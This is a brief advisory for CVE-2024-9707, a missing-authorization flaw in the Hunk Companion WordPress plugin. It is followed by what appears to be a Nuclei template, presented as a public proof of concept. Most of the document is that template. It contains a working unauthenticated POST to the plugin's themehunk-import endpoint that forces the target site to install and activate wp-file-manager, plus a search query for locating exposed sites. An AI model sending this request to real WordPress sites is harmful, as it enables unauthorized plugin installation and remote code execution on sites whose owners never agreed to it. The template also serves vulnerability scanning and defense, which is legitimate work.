The Hunk Companion plugin for WordPress is vulnerable to unauthorized plugin installation/activation due to a missing capability check on the /wp-json/hc/v1/themehunk-import REST API endpoint in all versions up to, and including, 1.8.4. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.
PoC代码[已公开]
id: CVE-2024-9707
info:
name: Hunk Companion <= 1.8.4 - Arbitrary Plugin Installation
author: DhiyaneshDK
severity: critical
description: |
The Hunk Companion plugin for WordPress is vulnerable to unauthorized plugin installation/activation due to a missing capability check on the /wp-json/hc/v1/themehunk-import REST API endpoint in all versions up to, and including, 1.8.4. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.
reference:
- https://wordpress.org/plugins/hunk-companion/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/9c101fca-037c-4bed-9dc7-baa021a8b59c?source=cve
- https://github.com/iSee857/CVE-PoC/blob/main/WordPress_Hunk_Companion(CVE-2024-9707).py
- https://github.com/RandomRobbieBF/CVE-2024-9707
- https://nvd.nist.gov/vuln/detail/CVE-2024-9707
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-9707
cwe-id: CWE-862
epss-score: 0.87009
epss-percentile: 0.99404
cpe: cpe:2.3:a:themehunk:hunk_companion:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: themehunk
product: hunk_companion
framework: wordpress
fofa-query: body="/wp-content/plugins/hunk-companion/"
tags: cve,cve2024,wp,wp-plugin,wordpress,hunk-companion,intrusive,vkev
http:
- raw:
- |
POST /wp-json/hc/v1/themehunk-import HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"params": {"templateType": "free", "plugin": {"wp-file-manager": "Wp File Manager"}, "allPlugins": [{"wp-file-manager": "wp-file-manager/wp-file-manager.php"}], "builder": "gogo", "themeSlug": "gogo", "proThemePlugin": "wp-file-manager", "tmplFreePro": "plugin", "wpUrl": "https://downloads.wordpress.org/", "thUrl": "https://themehunk.com/wp/data/"}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"\"https:\\\/\\\/'
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4b0a00483046022100ab6c699890063a380c0c92d69fddafe0c4e54de5e0b9e85fc657a52609905c030221009ead9a4ad420feb2195daead88b5dbe1d5879ef396c04884fff6e96729763f1e:922c64590222798bb761d5b6d8e72950